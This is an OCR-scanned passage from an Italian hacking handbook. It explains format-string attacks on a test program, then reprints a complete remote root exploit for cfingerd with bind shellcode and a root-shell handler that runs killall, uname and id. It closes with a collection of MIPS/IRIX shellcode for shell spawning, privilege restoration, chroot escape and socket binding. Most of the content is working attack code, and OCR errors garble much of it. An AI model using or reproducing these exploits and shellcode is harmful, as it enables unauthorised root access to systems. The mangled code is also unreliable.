In aggiunta per formattare l'argomento un secondo intero è settato e successivamente fatto uscire. 
Questa variabile viene usata come the target del successivo attacco. 
Per ora dobbiamo solo vedere che questo deve essere sempre 1 . 
A questo punto iniziamo a ragionare come attaccante. 

Abbiamo nelle mani un programma di test e sappiamo che questo possiede una vulnerabilità 

sapendo inoltre dove il programmatore ha commesso l'errore. 

A questo punto inizxamo a fare delle prova. 

Partiamo invocando il programma xcon argomenti normali. 

% ./fmtme "hello world" 
buffer (11) : hello world 
x is 1/0x1 (@ 0x804745c) 

Non c'è nulla di speciale fino a questo punto. 

Il programma formatta la nostra stringa all'interno del buffer e quindi stampa la sua lunghezza. 
Questo ci dice anche che la variabile x ha coma valore uno e che questo viene salvato all'indirizzo 
0x8047 45c. 

Ora proviamo a richiamare il programma con delle direttive di formattazione. 

In altre parole invece di passargli la stringa del tipo Hello World la stringa che gli passiamo è 

esattamente come una di quelle che dovrebbe essere presente come stringa di formattazione. 

% ./fmtme "%x %x %x %x " 
buffer (15) : 1 f31 1031 3133 



Una rapida analisi del programma ci rivela che il layout dello stack quando la funzione snprintf 
è chiamata fha la seguente forma : 



Address 


Contents 


Description 


fp+8 


Buffer pointer 


4 -byte address 


fp+12 


Buffer length 


4-byte integer 


fp+16 


Format string 


4-byte address 


fp+20 


Variable x 


4-byte integer 



Ora proviamo a a controllare I valori salvati dentro al buffer. 
Questi valori sono anche usati come argomenti per la snprintf. 

% ./fmtme "aaaa %x %x" 
buffer (15): aaaa 1 61616161 



I 4 caratteri 'a ' che forniamo in input sono copiati all'inizio del buffer e quindi interpretate dentro 

alla snprintf erme un valore intero con valore 0x61616161 ('a' è 0x61 in ASCII). 

Ora che tutti gli esempi sono stati fatti possiamo iniziare a vedere l'attacco trasformandolo in un 

sistema attivo in grado di alterare lo stato del programma. 

Vi ricordate dela variabile "x"? 

Proviamo a cambiare il suo valore. 

Per fare questo abbiamo inserito il suo indirizzo dentro ad uno degli argomenti snprintf. 
Dobbiamo quindi saltare oltre il primo argomento di snprintf, il quale è la variabile x, e quindi 
infine usiamo un formattatore "%n" per scrivere nell'indirizzo specificato. 
Questo potrebbe sembrare più complicato di quanto in effetti lo sia. 
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Come esempio, usiamo un piccolo programmino in PERL che ci permette di specificare dei 
caratteri arbitrariamente sulla linea di comando. 

% peri -e 'system "./fmtme", " \x58\x74\x04\x08%d%n"' 
buffer (5) : XI 



Il valore di x è cambiato. 

L'argomento di snprintf potrebbe sembrare a qualche cosa di simile a :ook 

snprintf (buf, sizeof buf, " \x58\x74\x04\x08%d%n" , x, 4 bytes front 
buf) 

All'inizio snprintf copia I primi 4 bytes dentro a buf. 

Successivamente esso esegue lo scan del formattatore "%d" e stampa il valore di x. 
Finalmente raggiunge la direttiva "%n". 

Questa inserisce il successivo valore dentro allo stack, il quale deriva dai primi 4 bytes di buf. 
Questi 4 bytes sono appena stati riempiti con "\x58\x74\x04\x08", o, interpretati come un 

intero, 0x08047458. 

snprintf quindi scrive il totale dei bytes di output, cinque, dentro a questo indirizzo. 
Questo di fatto è l'indirizzo della variabile x. 
Questa non è una coincidenza. 

Abbiamo scelto il valore 0x08047458 dalla precedente analisi del programma. 

In questo caso il programma ci ha aiuttato nello stampare l'indirizzo a cui noi siamo interessati. 

Tipicamente questo valore dovrebbe essere trovato con l'aiuto di un debugger. 

Possiamo inserire un indirizzo arbitrario e scriverci dentro. 

Ma di fatto possiamo scriverci un valore ? 

nprintf ci scrive solo il numero dei caratteri di output. 

% peri -e 'system "./fmtme", " \x54\x74\x04\x08% . 500d%n" 
buffer (99) : %0000000 . . . 0000 



Il valore che "%n" scrive in x è 504, più grande dei 99 caratteri attualmente emessi in buf. 
Possiamo anche fornire un valore arbitrario maggiore semplicemente specificando una 
dimansione di campo grande. 

Se scrivessimo quattro numeri ad un offset di un byte, potremmo costruire una intero fuori dai 
quattro bytes significativi. 
Per illustrare questo concetto : 

Address A A+1 A+2 A+3 A+4 A+5 A+6 

Write to A: Oxll Oxll Oxll Oxll 
Write to A+1: 0x22 0x22 0x22 0x22 
Write to A+2: 0x33 0x33 0x33 0x33 
Write to A+3: 0x44 0x44 0x44 0x44 



Dopo le quattro scritture sono state completate , il valore intero 0x44332211 è in memoria 

all'indirizzo A, composto da un byte meno significativo di quattro scritture. 

Questa tecnica ci offre la flessibilità di scegliere il valore da scrivere 

Questo pretende quattro quattro tempi per sedare il valore. 

In pratica esegue l'overwrite di tre bytes confinanti con l'indirizzo target 

Esso esegue anche tre scritture non allineate. 

Dato che le scritture non allineate non sono supportate da tutte le architetture il metodo di fatto 
non è portatile. 

Insomma tutto questo per dire che è possibile scrivere valori arbitrari in memoria e quindi di 
conseguenza mediante questa metodologia è possibile eseguire : 

• Soprascritture dell' UID di un programma al fine di elevare I privilegi. 
.• Soprascrivere un comando in esecuzione 

• Soprascrivere un indirizzo di ritorno per puntare a qualche punto di memoria dove ci sia un 
codice da eseguire.. 

Successivamente vedremo alcune tecniche specifiche legate a questo tipo di attacco. 
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Ora vediamo il codice usato in ambiente Linux utilizzante questa tecnica. 



/* remote exploit for linux/x86 - cfingerd <= 1.4.3 

* coded by venomous of rdC - 16/apr/01 
* 

* Its just a common formatstrlng bug uslng syslogO incorrectly . 

* We need to blnd as Identd, so dlsable your Identd in case you are 

* uslng it . 
* 

* BONUS: elp address Is brute forced, so relax and wait =) 
* 

* NOTE: for sure where we control the format strlng wlll change from 

* platform to platform. 

* And for sure, the shellcode address wlll change so maybe you 

* want to bruteforce thls too. (-1500 to +1500 should be fine 1 
guess) 

* 

* REMEMBER: thls code Is for educational propourses only, do not use 

* it on machines without authorization . 
* 

* INFO: cfingerd isnt a package of slackware 7. 0 

* cfingerd 1.4.1 is a package of debian 2.2 
* 

* Greets: kaOz, brujO, dnO, superluck, fugitivo ( ! ) 

* #flatline, #rdC 
* 

* Credit s : To Lez, who found this bug. 
* 

* http://www.rdcrew.com.ar - Argentinian Security Group. 

* venomousQrdcrew . com . ar 
*/ 



^include <stdio.h> 
^include <netinet/in . h> 
^include <sys/types.h> 
^include <sys/socket . h> 
^include <netdb.h> 
^include <signal . h> 
^include <sys/types.h> 
^include <sys/wait . h> 
^include <unistd. h> 



tidefine ROOTSHELLPORT 36864 



void chld_timeo () ; 
void chld_timeoo () ; 



int sserver; 
int cserver; 
int phase=0; 
int mmm=0; 



unsigned long glob; 

//unsigned long startaddr = Oxbffffdfc; 
unsigned long startaddr = 0xbffffb34; 
unsigned long stopaddr = OxbffffOOO; 

char pbuf[1024] ; 

char testcode [] = 

" \xeb \xOb \x2e \x72 \x64 \x43 \x2e \x72 \x6f\x63 \x6b \x73 \x2e \xeb \xfe "; 



char Un uxcode [] = 

/* Lamagra bind shellcode modified by me, 
" \xeb \x6e \x5e \x29 \xcO \x89 \x46\xl0" 



making it smaller =) - 124b */ 
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"\x46\x08\x8d\x4e\x08\xb0\x66\xcd" 
"\x80\x43\xc6\x46\xl0\xl0\x88\x46" 
"\x08\x31 \xc0\x31 \xd2\x89\x46\xl8" 
"\xb0\x90\x66\x89\x46\xl6\x8d\x4e" 
"\xl4 \x89 \x4e \xOc \x8d\x4e \x08 \xbO " 
" \x66\xcd\x80 \x89 \x5e \xOc \x43 \x43 " 
"\xb0\x66\xcd\x80\x89\x56\x0c\x89" 
"\x56\xl0\xb0\x66\x43\xcd\x80\x86" 
" \xc3 \xbO \x3f\x29 \xc9 \xcd\x80 \xbO " 
"\x3f\x41 \xcd\x80\xb0\x3f\x41 \xcd" 
"\x80\x88\x56\x07\x89\x76\x0c\x87" 
" \xf3 \x8d\x4b \xOc \xbO \xOb \xcd\x80 " 
" \xe8 \x8d\xff\xff\xff\x2f\x62 \x69 " 
"\x6e\x2f\x73\x68 "; 



struct os 
{ 

int Id; 
char *os; 
char *shellcode; 
int fsc; 

unsigned long shaddr; 
int offset; 



struct os types[]= 
{ 

{0, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as 
root", linuxcode, 22, 0xbffffbc4, 30}, 

{1, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as 
nobody", linuxcode, 22, 0xbffffbc4, 30}, 

{2, "debian 2.2 - default cfingerd 1.4.1 running from inetd as root", 
linuxcode, 33, 0xbffffb48, 0} , 

{3, "debian 2.2 - de fault cfingerd 1.4.1 running from inetd as nobody", 
linuxcode, 33, 0xbffffb48, 0} , 

{4, NULL, 0, Oxdeadbeef, 0} 

}; 

mainfint argc, char *argv[]) 
{ 

struct sockaddr_in sin; 

struct sockaddr_in ssin; 

int fd; 

int x; 

int xx=0; 

int sts=0; 

int pete; 

int a,b,c=22,d=0; /* c is used in case you want to seek the fsc on */ 

int guide=l; /* your system, starting from 22, change it if you */ 

int sel=0; /* want. */ 

int bleh=0; /* */ 

int off=0; 

int arx=0; 

int niu=0; 

int ye=0; 

char buf[1024]; 

char tex[512] ; 

if (argc < 4) 
{ 

printf ( "cfingerd <= 1.4.3 remote exploit coded by venomous of 
rdC\n\n"); 

printf ("Usage: %s <platform> <host> <offset>\n",argv[0]); 
printf ( "where <platform> is:\n"); 
for (x=0 ; types [x] .os != NULL ; x++) 

printf ("%d for %s\n", types [x] . id, types [x] . os) ; 
printf ( " \nhttp : //www . rdcrew. com. ar\n \n ") ; 
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; 

for (x=0 ; types [x] .os != NULL ; x++) 
{ 

if (types [x] . lei == atoi (argv[l] ) ) 
{ 

xx++; 

sei = types [x] . id; 

} 

} 

if (!xx) 
{ 

printf ("Unknown platform: %s\n" , argv[l] ) ; 
exit(l); 

} 

off = atoi (argv[3] ) ; 

printf ("Selected platform: %s (%d) \n" , types [sei] . os, sei) ; 
bzero (&sin, sizeof (sin) ) ; 

// fake identd 

sin. sin_family = AF_INET; 

sin. sin __port = htons (113) ; 

sin . sin_addr . s_addr = htonl (INADDR_ANY) ; 

if ( (fd = SOCket (AF_INET, SOCK_STREAM, 0) ) < 0) 

perror ( "socket ") ; 
exit (1) ; 

if ( (x = bindffd, (struct sockaddr *)&sin, sizeof (sin) ) < 0) ) 

perror ( "bind ") ; 
exit (1) ; 



if ( (xx = listen(fd, 5)) < 0) 

perror ( "listen ") ; 
exit(l); 

printf ("fake identd bound success fuly\n\n" ) ; 

printf ("pre-phase info: If you need to use the offset you can use safely 
steps of 120\n\n"); 

printf ("phase 0: finding eip... \n") ; 

while (guide) 

{ 

//maybe you need it . . 
// if (!d) 

// { 

preparebuf (sei, off, ye) ; 
fconnect(argv[2], ye, 79); 
// } 

pete = sizeof (ssin) ; 

if ( (sserver = accept (fd, (struct sockaddr *) Sssin, Spete) ) < 0) 
{ 

perror ( "accept ") ; 
exit(l); 

} 

bzero (buf, sizeof (buf) ) ; 

read (sserver, buf, sizeof (buf) ) ; 

//horrendus debug! :) 
tiifdef DEBUG 

printf ("\nread() : %s\n",buf) ; 

tendif 
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sscanf (buf , "%d, %d", &a, &b) ; 
bzero (buf, slzeof (buf) ) ; 
bzero (tex, slzeof (tex) ) ; 
memset (tex, ' \x90 ' ,119) ; 

bleh=strlen (pbuf) ; 
nlu = 0; 

while (1) 
{ 

if (strlen(pbuf) < 65) 
{ 

if (phase==0) 

pbuf[bleh] = '\x90'; 
else 

pbuf[bleh] = types [sei] . shellcode [niu] ; 
bleh++; 
if (phase==l) 

niu++; 

} 

else 

break; 

} 

arx = niu; 
if (!phase) 

for(bleh=0 ; bleh < strlen (testcode) ; bleh++) 

tex [119 - strlen (testcode) + bleh] = testcode [bleh] ; 

else 
( 

if ((119 - (strlen (types [sei] .shellcode) - arx)) < 0) 
Ì 

printf ("shellcode too long, exiting\n") ; 
exit (0) ; 

ì 

for ( bleh=0 ; bleh < ( (strlen (types [sei] . shellcode) ) - arx) ; 

bleh++) 

tex[119 - (strlen (types [sei] . shellcode) ) - arx + bleh] = 
types [sei] . shellcode [bleh+arx] ; 
} 

snprintf(buf,sizeof(buf),"%s : : : %s", tex, pbuf); 
/* use full for find the fsc on your system. 
//snprintf(buf,sizeof(buf),"%d , %d : UNIX : 1 : 
AAAA%%%d$p: fsc: %d\n" , a, b, c, c) ; 

// read about 'd' below 
if (d==2) ( c++; d=0; } 
*/ 

write (sserver, buf, sizeof (buf) ) ; 

//the same. . 
tiifdef DEBUG 

printf ("sent: %s\n \n",buf); 

tiendif 

dose (sserver) ; 
sleep (2) ; 

//same. . 
// if(d) 
wait (Ssts) ; 
// d++; 

/* if something like tcplogd is running there will be 3 connections 
* to identd, so in that case, d==3 
*/ 
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// d=0; 

if ( (WEXITSTATUS (sts) ) == 1) // elp/shellcode address ok (at phase 

0) 

{ 

phase=l; ye=l; sts=0; 

prlntf ("\nphase 1: calculatlng address of the first chacarcter 
in our buffer. . . wait\n") ; 
} 

if ( (WEXITSTATUS (sts) ) == 2) // shellcode executed (at phase 1) 
{ 

printf ("\nphase 2 connecting to rootshell . . . ") ; 
fflush (stdout) ; 

dose (fd) ; //identd fake server 

fconnect (argv[2] , 2, ROOTSHELLPORT) ; 

printf ("\n\nThanks for using rdC products ! \n\n" ) ; 

exit (0) ; 

} 

} 

ì 

int fconnect (char *hname, int what, int port) 
{ 

struct hostent *host; 
struct sockaddr_in d; 
int r; 

char hname2 [128] ; 

char response [1024] ; 

d. sin_family = AF_INET; 

d.sin _port = htons (port) ; 

bzero (hname2, sizeof (hname2) ) ; 
strncpy (hname2, hname, sizeof (hname2) ) ; 
host = gethostbyname (hname2) ; 
if (ìhost) 
{ 

printf ( "cannot resolve\n") ; 
exit (0) ; 

} 

bcopy (host->h_addr , (struct in_addr *) &d. sin_addr, host->h_length) ; 
cserver = socket (AF_INET , SOCK_STREAM, 0) ; 

// you can add a timeout here, but supossly you know if the server 

// is up/not firewalled, because you are using it against an authorized 

// machine and not in a script/not authorized machine, right? 

if (connect (cserver, (struct sockaddr *)&d, sizeof (struct sockaddr) ) < 

0) 

{ 

perror ( "connect ") ; 
exit(l); 

} 

if (what ==2) 
{ 

printf ( "connected! \n ") ; 
fflush (stdout) ; 
rootsox (cserver) ; 
dose (cserver) ; 
return; 

} 

write (cserver, "a \n ", strlen ( "a \n ") ) ; 
if ((fork()) == 0) 
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{ 

prlntf ("Waltlng response . . . "); 
for(r=0 ; r < 19 ; r++) 

prlntf ("\b") ; 
fflush (stdout) ; 

bzero (response, slzeof (response) ) ; 
If (what==0) 

slgnal (SIGALRM, chld_timeo) ; 

else 

slgnal (SIGALRM, chld_tlmeoo) ; 
alarm (30) ; 

read (cserver, response , slzeof (response) ) ; 

If (strstr (response, "SIGILL") ) 

{ 

prlntf ("Illegal Instruction\r" ) ; 
fflush (stdout) ; 
dose (cserver) ; 
exit (0) ; 

) 

if (strstr (response, "SIGSEGV")) 
{ 

prlntf ("Segmentation Fault. \r") ; 
fflush (stdout) ; 
dose (cserver) ; 
exit (0) ; 

) 

//you might add strings here. . 

if (strstr (response, "Sorry, that user doesn't exist") Il 
strstr (response, "Debian GNU/Linux" ) ) 
{ 

prlntf ("server not crashed. \r" ) ; 
fflush (stdout) ; 
dose (cserver) ; 
exit (0) ; 

) 

) 

//dose (cserver) ; 

} 

/* <huh> */ 

void chld_timeo ( ) 

{ 

alarm ( 0) ; 

slgnal (SIGALRM, SIG_DFL) ; 

prlntf ("EIP FOUND! - SHELLCODE ADDR OK!\n"); 
fflush (stdout) ; 
dose (cserver) ; 
exit(l); 

} 

void chld_timeoo () 
{ 

alarm ( 0) ; 

slgnal (SIGALRM, SIG_DFL) ; 
prlntf ("shellcode executed! \n") ; 
fflush (stdout) ; 
dose (cserver) ; 
exit (2) ; 

) 

/* </huh> */ 

int rootsox (int sox) 
{ 

fd_set rset; 
int n; 

char buffer [4096] ; 
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/* we kill the efingerci in eternai loop and we run other nice commands 

;) 

*/ 

char *command=" /bin/killall -9 c fingerà ; /bln/uname -a ; 
/usr/bln/id\n "; 

send(sox, command, strlen (cowmand) , 0) ; 

for (;;) { 

FD_ZERO (Srset) ; 

FD_SET (sox, Srset) ; 

FD_SET (STDIN_FILENO, Srset); 

n = selectfsox + 1, Srset, NULL, NULL, NULL) ; 
if(n <= 0) 

return (-1) ; 

lf(FD_ISSET (sox, Srset)) { 

n = recv (sox, buffer, slzeof (buffer) , 0) ; 
If (n <= 0) 
break; 

write (STDOUT_FILENO, buffer, n) ; 

} 

if(FD_ISSET (STDIN_FILENO, Srset)) { 

n = read (STDIN_FILENO, buffer, slzeof (buffer) ) ; 
if (n <= 0) 
break; 

sendfsox, buffer, n, 0) ; 

} 

} 

return 0; 

} 

//heavly modlfled formatstring engine front rdC-LPRng.c exploit - 12/00 
preparebuf (Int sei, Int off, Int what) 
{ 

unslgned long addr; 
unslgned long a, b, c, d; 
Int pasl,pas2,pas3,pas4; 
Int 1; 

char t emp [512] ; 
char buf[512]; 
char atemp[128] ; 
char bufx[512]; 

startaddr = startaddr - 0x4; 
addr = startaddr; 

bzero (temp, slzeof (temp) ) ; 
bzero (buf, slzeof (buf) ) ; 
bzero (bufx, slzeof (bufx) ) ; 
bzero (atemp, slzeof (atemp) ) ; 

if (addr == stopaddr) 
{ 

printf ("\nreached stopaddr, change shellcode address/fsc\n") ; 
exit(l); 

} 

if(what) 
{ 

off-=mram; 
mmm++; 

} 
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if (mmm == 185) 
{ 

prlntf ("?!.. we cant find the first character of our 
shellcode!§@\n") ; 

exit (0) ; 

} 



snprintf (temp, sizeof (temp) , "%p", types [sei ] . shaddr+types [sei ] . offset+off) ; 
sscanf (temp, "0x%2x%2x%2x%2x" , Sa, &b, &c, Sd) ; 
pasl = d - (16 * 2); 
pasl = cn(pasl); 
pas2 = c - d; 
pas2 = cn (pas2) ; 
pas3 = b - c; 
pas3 = cn (pas3) ; 
pas4 = a - b; 
pas4 = cn (pas4) ; 

if(what) 

addr = glob; 

else 

glob = addr; 

printf ("eip: %p - shellcode addr: %p - 
", addr, types [sei ] . shaddr+types [sei ] . offset+off) ; 
fflush (stdout) ; 

for (i=0 ; i < 4 ; i++) 
{ 

snprintf (atemp, sizeof (atemp) , "%s", &addr) ; 

strncat (buf, atemp, 4) ; 

addr++; 

} 



snprintf (buf x, sizeof (buf x) , "%%. %du%%%d$n%% . %du%%%d$n%% . %du%%%d$n%% . %du%%%d$n 
",pasl, (types [sei] . f se) ,pas2, (types [sei] .f se) +I,pas3, (types [sei] . fsc) +2,pas4 
, types [ sei ] . fsc+3) ; 

streat (buf, bufx) ; 

bzero (pbuf, sizeof (pbuf) ) ; 

strncpy (pbuf, buf, sizeof (pbuf) ) ; 

} 

enfunsigned long addr) 
{ 

char he [128]; 

snprintf (he, sizeof (he) , "%d", addr) ; 
if (atoi (he) < 8) 

addr = addr + 256; 

return addr; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Codici assembler per usi legati ai buffers 

Fino ad ora abbiamo parlato delle tecniche che avrebbero dovuto permettere di inserire 

dentro a dei buffers i codici da fare eseguire tramite la soprascrittura degli indirizzi di ritorno. 

In altre parole all'interno dei vari buffer overflow è necessario inserire dei codici assembler 

per cui il problema spesso è quello di non essere in grado di scrivere le varie parti di codice 

che chiaramente devono essere specifiche per il processore attaccato. 

Mediante la varie routine di analisi è necessario cercare di capire anche l'architettura 

interessata in quanto chiaramente un codice scritto in asembler per un sistema LINUX su 

architettura X86 non funzionerà su un processore MIPS. 

Qui a seguito vi riporto i codici assembler per vari scopi e varie architetture. 

In generale gli scopi sono questi : 



Shell Execution: 



execl (" /bln/sh" 



Vbin/sh", 0); 



Shell Single Command Execution: 
Privilege Restoration: 



execl ("/bln/sh" , "/bln/sh", "-c", cmd, 0) ; 

setuld(O) ; 
setBuid(O) ; 

setreuid(getuid() , 0) ; 
setreuid ( 0, 0) ; 
setresuid (0, 0, 0) ; 



Chroot Limited Enviroment Escape: 



mkdir ("a. . ." , mode) ; 
chroot C" a . . " ) ; 
for (1=257; I — ;I>0) chdir ( 
chroot C ."); 



w tr 



)} 



Find Socket Code (findsckcode): 



j=slzeof (sockaddr_in) ; 
for(l=256;±>=0;i — ; { 

if (getpee marne (sck, Sadr, &j) ==-1) 
continue; 

if (* ( (unsigned 

short) & (adr[2]) ) ==htons (port) ) 
break; 

} 

for(j=2;j>=0;j—) dup2(j,i); 



Network server code (bindsckcode): 



sck=socket (AF_INET, SOCK_ S TREAM, 0) ; 

bind (sck, addr, sizeof (addr) ) ; 

listen (sck, 5) ; 

clt=accept (sck, NULL, 0) ; 

for (1=2; i>=0; i — ; dup2 (1, clt) ; 



Stack pointer retrieval Gump): 

Ad ogni modo la edifica asembler la 
nella seguente tabella. 



int sp= (* (int (*)()) jump) () ; 
potete trovare nelle pagine che seguono e sono riassunti 



processor 


system 


ver sion 


p S C P R F B 


mips 


irix 


5.3 6.2 6.3 6.4 6.5 6.5.10 


— X X X X X X 


sparc 


solaris 


2.6 2.7 2.8 


— X X X X X X 


parisc 


hp-ux 


10.20 


— X X X X X X 


powerpe 


aix 


4.1 4.2 4.3 


X X X X X X X 


alpha 


ultrix 


5. 0 


— X x x — — — 


x86 


solaris 


2.6 2.7 2.8 


X X X X X X X 


x86 


beos 


5. 0 


— x x — — — — 


x86 


linux 


6.2 (redhat) 


— X X X X X X 


x86 


openbsd 


2.8 


— X X X X X X 


x86 


freebsd 


3.4 


— X X X X X X 


x86 


netbsd 


1.5 


— X X X X X X 


x86 


openserver 


5.0.4 


X X X X x - - 
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Dove le lettere specificano : 



p — prefix 

S — Interactive shell 

C — single command 

P - restore privileges 

R - escape chroot jail 



IRIX/MIPS codes, file: mips-irix 

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland * : / / Isd-pl . net / §*/ 

/*## asmcodes for irix 5.3 6.2 6.3 6.4 6.5 6.5.10 mips #*/ 



/* 



syscall 


%v0 


%a0, %al, %a2, %a3 


execv 


x3f3 


->path="/bin/sh", -> [->aO=path, 0] 


execv 


x3f3 


->path=" /bin/sh" ,-> [->aO=path, ->al="-c", ->a2=cmd, 0] 


getuid 


x400 




setreuid 


x464 


ruid, euid=0 


mkdir 


x438 


—>path="a . . " ,mode= (each value is valid) 


chroot 


x425 


->path={"a. . ", ". "} 


chdir 


x3f4 


->path=" . . " 


getpeername 


x445 


sfd, ->sadr=[] , -> [len=605028752] 


socket 


x453 


AF_INET=2, SOCK__STREAM=2,prot=0 


bind 


x442 


sfd, ->sadr=[0x30, 2, hi, lo, 0, 0, 0, 0] , len=0xlO 


listen 


x448 


sfd, backlog=5 


accept 


x441 


sfd, 0, 0 


dose 


x3ee 


fd={0,l,2} 


dup 


x411 


sfd 



*/ 



§if defined(MIPS) && defined(IRIX) 



char shellcode[] = 


/* 


9*4+7 bytes 


*/ 


"\x04\xl0 \xff\xff" 


/* 


bltzal 


$zero, <shellcode> 


*/ 


"\x24 \x02 \x03 \xf3 " 


/* 


li 


$v0, 1011 


*/ 


" \x23 \xff\x01 \xl4" 


/* 


addi 


$ra, $ra,276 


*/ 


" \x23 \xe4 \xff\x08 " 


/* 


addi 


$a0, $ra, -248 


*/ 


"\x23\xe5\xff\xl0" 


/* 


addi 


$al, $ra,-220 


*/ 


" \xaf\xe4 \xff\xlO" 


/* 


sw 


$a0, -220 ($ra) 


*/ 


"\xaf\xeO \xff\xl 4 " 


/* 


sw 


$zero, -236 ($ra) 


*/ 


"\xa3\xe0 \xff\xOf" 


/* 


sb 


$zero, -241 ($ra) 


*/ 


" \x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


"/bin/sh " 

r 










char cmdshellcode [] = 


/* 


14*4+12+cmdlen bytes 


*/ 


"\x04\xl0 \xff\xff" 


/* 


bltzal 


$zero, <cmdshellcode> 


*/ 


"\x24 \x02 \x03 \xf3 " 


/* 


li 


$v0, 1011 


*/ 


" \x23 \xff\x08 \xfO " 


/* 


addi 


$ra, $ra, 2288 


*/ 


" \x23 \xe4 \xf7\x40 " 


/* 


addi 


$a0, $ra,-2240 


*/ 


" \x23 \xe5 \xfb\x24 " 


/* 


addi 


$al, $ra, -1244 


*/ 


"\xaf\xe4\xfb\x24" 


/* 


sw 


$a0,-1244 ($ra) 


*/ 


"\x23\xe6\xf7\x48" 


/* 


addi 


$a2, $ra,-2232 


*/ 


"\xaf\xe6\xfb\x28" 


/* 


sw 


$a2,-1240 ($ra) 


*/ 


"\x23\xe6\xf7\x4c" 


/* 


addi 


$a2, $ra,-2228 


*/ 


"\xaf\xe6\xfb\x2c" 


/* 


sw 


$a2,-1236($ra) 


*/ 


"\xaf\xe0\xfb\x30" 


/* 


sw 


$zero, -1232 ($ra) 


*/ 


"\xa3\xe0 \xf7\x4 7 " 


/* 


sb 


$zero, -2233 ($ra) 


*/ 


"\xa3\xe0 \xf7\x4a " 


/* 


sb 


$zero, -2230 ($ra) 


*/ 


" \x03 \xff\xff\xcc " 


/* 


syscall 




*/ 



"/bin/sh -c 
/* command */ 



char setreuidcode [ ] = 

"\x24\x02\x04\x01 " 
"\x20 \x42 \xff\xff" 
" \x03 \xff\xff\xcc " 
"\x30\x44\xff\xff" 



/* 7*4 bytes 
/* li $v0, 1024+1 

/* addi $v0, $v0, -1 
/* syscall 

/* andi $aO,$vO,Oxffff 



*/ 
*/ 
*/ 
*/ 
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•\x30 \x05 \xff\xff" 
'\x24\x02\x04\x64 " 
■' \x03 \xff\xff\xcc " 



/* andi $al,$zero,Oxffff */ 
/* li $v0,1124 */ 

/* syscall */ 



chrootcode [ ] = 


/* 


18*4 bytes 


*/ 


\x30\x61. . " 










\x04\xl0\xff\xff" 


/* 


bltzal 


$zero, <chrootcode+4> 


*/ 


\xaf\xeO \xff\xf8 " 


/* 


sw 


$zero, -8 ($ra) 


*/ 


\x23 \xe4 \xff\xf5 " 


/* 


addi 


$a0, $ra, -11 


*/ 


\x24\x02\x04\x38" 


/* 


li 


$v0, 1080 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x23 \xe4 \xff\xf5 " 


/* 


addi 


$a0, $ra,-ll 


*/ 


\x24\x02\x04\x25" 


/* 


li 


$v0,1061 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x24\xll\x01\x01 " 


/* 


li 


$sl,257 


*/ 


\x23\xe4\xff\xf6" 


/* 


addi 


$a0, $ra,-10 


*/ 


\x24\x02\x03\xf4" 


/* 


li 


$v0,1012 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x22\x31 \xff\xff" 


/* 


addi 


$sl,$sl,-l 


*/ 


\x06\x21\xff\xfb" 


/* 


bgez 


$sl, <chrootcode+40> 


*/ 


\x23 \xe4 \xff\xf7 " 


/* 


addi 


$a0, $ra,-9 


*/ 


\x24\x02\x04\x25" 


/* 


li 


$v0,1061 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 



findsckcode [] = 


/* 


29*4 bytes 


*/ 


\x04\xl0\xff\xff" 


/* 


bltzal 


$zero, <findsckcode> 


*/ 


\x24\xl0\x01\x90" 


/* 


li 


$s0, 400 


*/ 


\x22\xll\x01\x9c" 


/* 


addi 


$sl,$s0,412 


*/ 


\x22\x0d\xfe\x94 " 


/* 


addi 


$t5, $s0, -(400-36) 


*/ 


\x03\xed\x68\x20" 


/* 


add 


$t5, $ra, $t5 


*/ 


\x01\xa0\xf0\x09" 


/* 


jalr 


$s8, $t5 


*/ 


\x97\xeb\xff\xc2" 


/* 


lhu 


$t3, -62 ($ra) 


*/ 


\x24\x0c\xl2\x34" 


/* 


li 


$t4, 0x1234 


*/ 


\x01\x6c\x58\x23" 


/* 


subu 


$t3, $t3,$t4 


*/ 


\x22 \x0d\xfe \xbc " 


/* 


addi 


$t5, $s0,- (400-76) 


*/ 


\xll\x60\xff\xf9" 


/* 


beqz 


$t3, <findsckcode+16> 


*/ 


\x22\x24\xfe\xd4 " 


/* 


addi 


$a0, $sl,-300 


*/ 


\x23\xe5\xff\xc0" 


/* 


addi 


$al, $ra,-64 


*/ 


\x23\xe6\xff\xfc" 


/* 


addi 


$a2, $ra, -4 


*/ 


\x24\x02\x04\x45" 


/* 


li 


$v0,1093 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x22\x31 \xff\xff" 


/* 


addi 


$sl, $sl,-l 


*/ 


\xl0\xe0\xff\xf4" 


/* 


beqz 


$a3, <findsckcode+24> 


*/ 


\x22\x2b\xfe\xd4 " 


/* 


addi 


$t3,$sl,-300 


*/ 


\xld\x60 \xff\xf7 " 


/* 


bgzt 


$t3, <findsckcode+44> 


*/ 


\x22\x04\xfe\x72" 


/* 


addi 


$a0, $s0,-398 


*/ 


\x24 \x02 \x03 \xee " 


/* 


li 


$v0,1006 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x22 \x24 \xfe \xd5 " 


/* 


addi 


$a0, $sl,-299 


*/ 


\x24\x02\x04\xll" 


/* 


li 


$v0, 1041 


*/ 


\x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


\x22 \xl 0 \xff\xff" 


/* 


addi 


$sO,$sO,-l 


*/ 


\x22 \x0b\xfe \x72" 


/* 


addi 


$t3, $s0,-398 


*/ 


\x05\x61\xff\xf7" 


/* 


bgez 


$t3, <findsckcode+80> 


*/ 



char 



bindsckcode [] = 


/* 


31*4 bytes 


*/ 


•\x30\x02\xl2\x34" 










'\x04\xl0 \xff\xff" 


/* 


bltzal 


$zero, <bindsckcode+4> 


*/ 


•\x24\xll\x01\xff" 


/* 


li 


$sl, 511 


*/ 


•\xaf\xeO \xff\xf8 " 


/* 


sw 


$zero, -8 ($ra) 


*/ 


' \x22 \x24 \xfe \x03 " 


/* 


addi 


$a0, $sl,-509 


*/ 


' \x22 \x25 \xfe \x03 " 


/* 


addi 


$al, $sl,-509 


*/ 


•\x22\x26\xfe\x01 " 


/* 


addi 


$a2, $sl,-511 


*/ 


